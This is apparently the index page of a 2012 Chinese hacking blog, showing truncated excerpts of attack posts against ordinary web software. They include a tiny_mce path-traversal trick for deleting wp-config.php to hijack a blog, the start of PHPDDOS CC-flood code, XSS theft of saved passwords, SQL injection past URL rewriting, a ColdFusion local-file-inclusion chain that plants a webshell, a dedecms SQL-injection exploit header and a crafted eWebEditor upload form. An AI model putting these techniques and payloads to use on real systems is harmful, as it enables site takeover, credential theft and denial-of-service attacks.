zencart编辑器tiny_mce的爆路径漏洞

   
分类:安全 | 2012-01-8 | 撸过 1,393 次
0人扯蛋

zencart编辑器tiny_mce的跨目录操作漏洞

   
分类:安全 | 2012-01-8 | 撸过 1,306 次
0人扯蛋


路径为:http://www.webshell.cc/editors/tiny_mce/plugins/ImageManager/manager.php?b=/home/salehots/public_html/
比较鸡肋,不是所有的网站都有用Tiny_mce,不过放到字典里扫描下还是可以扫出几个的。
可以编辑JPG,当然也可有删除文件的功能。
目前想到的就是删除配置文件,比如博客的配置文件,然后重新建立博客,进后台拿权限。
如图,跳到博客目录里删除wp-config.php

然后打开博客,就出现了开始配置博客的信息。

PHPDDOS的UDP攻击,TCP攻击,和CC攻击的核心代码

   
分类:安全 | 2012-01-8 | 撸过 1,431 次
0人扯蛋

以下代码取自PHPDDOS.com
CC攻击模块

<?php
echo "状态 : 正常运行中.....<br>";
echo "================================================<br>";
echo "  <font color=blue>www.phpddos.com<br>";
echo "  CC Flood 模块<br>";
echo "  作者:ybhacker<br>";
echo "  警告:本程序带有攻击性,仅供安全研究与教学之用,风险自负!<[......]

继续阅读

XSS获取用户明文密码

   
分类:安全 | 2012-01-5 | 撸过 1,861 次
0人扯蛋

浏览器特性导致,firefox与chrome是默认这样的。IE8默认不会。其他的不关心不测试。
浏览器在用户登录时,会提示用户是否记住密码
1、对于firefox,用户有三个选择:记住、不记录本站、暂不。

2、对于chorme,用户只有在输入正确密码登录成功后,才会出现提示:“想让谷歌浏览器保存您的密码吗?”,用户有两个选择:保存密码、此站一律不保存密码。

3、而当在“自动完成”设置里开启IE8的“表单上的用户名和密码”功能时,IE8会在用户登录时弹窗提醒是否记住。

其实这些都是类似于普通的表单自动完成功能,不过又不太一样。

最关键的一点在于密码是“顶级”隐私信息,浏览器会专门有一个[......]

继续阅读

PHP批量检查网站的sitemap是否存在

   
分类:安全 | 2012-01-3 | 撸过 1,035 次
0人扯蛋

文章转载,话不多说,代码其实可以改的更好点。

<?php
$webfile = "sitexml.txt";
$opensite = fopen($webfile, 'r');

function curl($url) {
	/*
	* 测试用的浏览器信息
	*

	*/
	$browsers = array (

		"user_agent" => "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 (.NET CLR 3.5.30729)",
		"l[......]

继续阅读

突破伪静态的四种注入方法

   
分类:安全 | 2012-01-2 | 撸过 2,328 次
1人扯蛋

伪静态,主要是为了隐藏传递的参数名,伪静态只是一种URL重写的手段,既然能接受参数输入,所以并不能防止注入。目前来看,防止注入的最有效的方法就是使用LINQ。常规的伪静态页面如下:http://www.webshell.cc/play/Diablo.html, 在看到之前先要确定这个页面是静态还是伪静态,鉴别方法很多。

例如关联的动态页面是game.php ,那么当用户访问后程序会自动转换成类似http://www.webshell.cc/game.php?action=play&amp; name=Diablo 的形式,当然这部分是PHP执行的所以在访问时看不到。假如name=Di[......]

继续阅读

各大网站数据泄漏进程

   
分类:安全 | 2012-01-2 | 撸过 1,051 次
0人扯蛋

12月21日:CSDN 640W用户帐户,密码,邮箱遭到黑客泄露

数据泄漏进程
12月22日:中国各大知名网站全面沦陷....涉及范围甚广,泄露信息涉及用户相关业务甚多....

数据泄漏进程
一场席卷全中国的密码安全问题爆发了....

数据泄漏进程
12月23日:经过确认 CSDN 泄露 多玩 泄露 梦幻西游帐户通过木马泄露 人人网部分泄露

数据泄漏进程
12月23日:网友爆料 天涯沦陷...7K7K包中包含天涯帐户密码!!!互联网安全何在???

数据泄漏进程
12月24日:178沦陷 UUU9沦陷 事态蔓延...

数据泄漏进程
12月24日 15:30:天涯全面沦陷 泄露多达90[......]

继续阅读

cfm本地包含漏洞利用

   
分类:安全 | 2012-01-1 | 撸过 1,558 次
0人扯蛋

1.读取metabase.xml/web.xml /password.properities敏感文件,得知www路径,coldfusion路径,coldfusion后台加密密码

2.本地包含coldfusion日志,写cfm一句话,得到WEBSHELL

http://www.webshell.cc/index.cfm?action=../../../../../../../../../../CFusionMX7/logs/application.log%00

 

http://www.webshell.cc/index.cfm?action=<CFHTTP METH[......]

继续阅读

dedecms通杀SQL注入

   
分类:安全 | 2012-01-1 | 撸过 1,183 次
0人扯蛋

# Dede Cms All Versions Sql Vulnerability Exploit
# </ No Priv8 , Everything is Public >
# Date: 30/12/2011 - 13:00
# Author: [ CWH ] | Finded By : Nafsh
# We Are : Mr.M4st3r , Nafsh , Skote_Vahshat , HijaX
# Support: Cyberwh.org
# Mail: Nafsh@live.com
# Software Website: http://www.dedecms.[......]

继续阅读

手动构建htm代码直接传给upload

   
分类:安全 | 2011-12-30 | 撸过 1,068 次
0人扯蛋

<form action="http://www.badguest.cn /ewebeditor/upload.asp?action=save&type=IMAGE&style=standard1" method=post name=myform enctype="multipart/form-data">
<input type=file name=uploadfile size=1 style="width:100%" onchange="originalfile.value=this.value">
<input type=hidden na[......]

继续阅读